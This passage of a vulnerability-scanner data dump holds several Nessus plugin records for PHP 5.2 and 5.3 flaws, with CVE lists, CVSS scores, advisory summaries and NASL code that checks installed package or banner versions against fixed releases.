yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_dblib-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_mysql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_odbc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_pgsql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_sqlite-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pgsql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-posix-5.3.1-0.1mdv2010.0\", 
yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pspell-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-readline-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-recode-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-session-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-shmop-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-snmp-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-soap-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sockets-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sqlite3-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-suhosin-0.9.29-2.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sybase_ct-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sysvmsg-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sysvsem-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sysvshm-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-tidy-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-tokenizer-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-wddx-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xml-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", 
reference:\"php-xmlreader-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xmlrpc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xmlwriter-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xsl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-zip-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-zlib-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:54:24", "description": "According to its banner, the version of PHP 5.3 installed on the\nremote host is older than 5.3.1. Such versions may be affected by\nseveral security issues :\n\n - Sanity checks are missing in exif processing.\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'.\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'.\n\n - The 'safe_mode_include_dir' configuration setting may\n be ignored. (Bug #50063)\n\n - Calling 'popen()' with an invalid mode can cause a \n crash under Windows. (Bug #44683)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script \n doesn't actually support file uploads per se. 
By\n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list.\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)\n\n - An unspecified vulnerability affects the LCG entropy.", "edition": 25, "published": "2009-11-20T00:00:00", "title": "PHP 5.3 < 5.3.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3559", "CVE-2010-1128", "CVE-2009-3557"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_3_1.NASL", "href": "https://www.tenable.com/plugins/nessus/42862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42862);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2009-3557\",\n \"CVE-2009-3559\",\n \"CVE-2009-4017\",\n \"CVE-2009-4018\",\n \"CVE-2010-1128\"\n );\n script_bugtraq_id(36554, 36555, 37079, 37138);\n script_xref(name:\"Secunia\", value:\"37412\");\n\n script_name(english:\"PHP 5.3 < 5.3.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP 5.3 installed on the\nremote host is older than 5.3.1. Such versions may be affected by\nseveral security issues :\n\n - Sanity checks are missing in exif processing.\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'.\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'.\n\n - The 'safe_mode_include_dir' configuration setting may\n be ignored. 
(Bug #50063)\n\n - Calling 'popen()' with an invalid mode can cause a \n crash under Windows. (Bug #44683)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script \n doesn't actually support file uploads per se. By\n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list.\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)\n\n - An unspecified vulnerability affects the LCG entropy.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/507982/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_3_1.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.1\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to PHP version 5.3.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n 
script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.3\\.0($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.3.1\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:41:27", "description": "PHP developers reports :\n\nThis release focuses on improving the stability of the PHP 5.2.x\nbranch with over 60 bug fixes, some of which are security related. All\nusers of PHP 5.2 are encouraged to upgrade to this release.\n\nSecurity Enhancements and Fixes in PHP 5.2.12 :\n\n- Fixed a safe_mode bypass in tempnam() identified by Grzegorz\nStachowiak. (CVE-2009-3557, Rasmus)\n\n- Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz\nStachowiak. (CVE-2009-3558, Rasmus)\n\n- Added 'max_file_uploads' INI directive, which can be set to limit\nthe number of file uploads per-request to 20 by default, to prevent\npossible DOS via temporary file exhaustion, identified by Bogdan\nCalin. 
(CVE-2009-4017, Ilia)\n\n- Added protection for $_SESSION from interrupt corruption and\nimproved 'session.save_path' check, identified by Stefan Esser.\n(CVE-2009-4143, Stas)\n\n- Fixed bug #49785 (insufficient input string validation of\nhtmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot\ncom)", "edition": 26, "published": "2009-12-18T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (39a25a63-eb5c-11de-b650-00215c6a37bb)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "modified": "2009-12-18T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php5"], "id": "FREEBSD_PKG_39A25A63EB5C11DEB65000215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/nessus/43342", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43342);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (39a25a63-eb5c-11de-b650-00215c6a37bb)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP developers reports :\n\nThis release focuses on improving the stability of the PHP 5.2.x\nbranch with over 60 bug fixes, some of which are security 
related. All\nusers of PHP 5.2 are encouraged to upgrade to this release.\n\nSecurity Enhancements and Fixes in PHP 5.2.12 :\n\n- Fixed a safe_mode bypass in tempnam() identified by Grzegorz\nStachowiak. (CVE-2009-3557, Rasmus)\n\n- Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz\nStachowiak. (CVE-2009-3558, Rasmus)\n\n- Added 'max_file_uploads' INI directive, which can be set to limit\nthe number of file uploads per-request to 20 by default, to prevent\npossible DOS via temporary file exhaustion, identified by Bogdan\nCalin. (CVE-2009-4017, Ilia)\n\n- Added protection for $_SESSION from interrupt corruption and\nimproved 'session.save_path' check, identified by Stefan Esser.\n(CVE-2009-4143, Stas)\n\n- Fixed bug #49785 (insufficient input string validation of\nhtmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot\ncom)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_12.php\"\n );\n # https://vuxml.freebsd.org/freebsd/39a25a63-eb5c-11de-b650-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95912059\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.2.12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:54:23", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.12. Such versions may be affected by several\nsecurity issues :\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'. (CVE-2009-3557)\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'. \n (CVE-2009-3558)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script\n doesn't actually support file uploads per se. By \n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list. (CVE-2009-4017)\n\n - Missing protection for '$_SESSION' from interrupt\n corruption and improved 'session.save_path' check.\n (CVE-2009-4143)\n\n - Insufficient input string validation in the \n 'htmlspecialchars()' function. 
(CVE-2009-4142)", "edition": 25, "published": "2009-12-18T00:00:00", "title": "PHP < 5.2.12 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_12.NASL", "href": "https://www.tenable.com/plugins/nessus/43351", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43351);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2009-3557\",\n \"CVE-2009-3558\",\n \"CVE-2009-4017\",\n \"CVE-2009-4142\",\n \"CVE-2009-4143\"\n );\n script_bugtraq_id(37389, 37390);\n script_xref(name:\"Secunia\", value:\"37821\");\n\n script_name(english:\"PHP < 5.2.12 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(attribute:\"description\",value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.12. Such versions may be affected by several\nsecurity issues :\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'. (CVE-2009-3557)\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'. \n (CVE-2009-3558)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script\n doesn't actually support file uploads per se. By \n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list. 
(CVE-2009-4017)\n\n - Missing protection for '$_SESSION' from interrupt\n corruption and improved 'session.save_path' check.\n (CVE-2009-4143)\n\n - Insufficient input string validation in the \n 'htmlspecialchars()' function. (CVE-2009-4142)\"\n );\n # http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57f2d08f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_12.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.2.12\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to PHP version 5.2.12 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = 
get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^[0-4]\\.\" || \n version =~ \"^5\\.[01]\\.\" ||\n version =~ \"^5\\.2\\.([0-9]|1[01])($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.12\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:33", "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\n13.0, and -current to fix security issues.", "edition": 25, "published": "2010-01-25T00:00:00", "title": "Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / current : php (SSA:2010-024-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "modified": "2010-01-25T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2010-024-02.NASL", "href": "https://www.tenable.com/plugins/nessus/44121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2010-024-02. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44121);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n script_bugtraq_id(37079, 37390);\n script_xref(name:\"SSA\", value:\"2010-024-02\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / current : php (SSA:2010-024-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\n13.0, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.490297\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78ed463b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif 
(slackware_check(osver:\"13.0\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:54:22", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.11. Such versions may be affected by several\nsecurity issues :\n\n - An unspecified error occurs in certificate validation\n inside 'php_openssl_apply_verification_policy'.\n\n - An unspecified input validation vulnerability affects\n the color index in 'imagecolortransparent()'.\n\n - An unspecified input validation vulnerability affects\n exif processing.\n\n - Calling 'popen()' with an invalid mode can cause a\n crash under Windows. (Bug #44683)\n\n - An integer overflow in 'xml_utf8_decode()' can make it\n easier to bypass cross-site scripting and SQL injection \n protection mechanisms using a specially crafted string \n with a long UTF-8 encoding. 
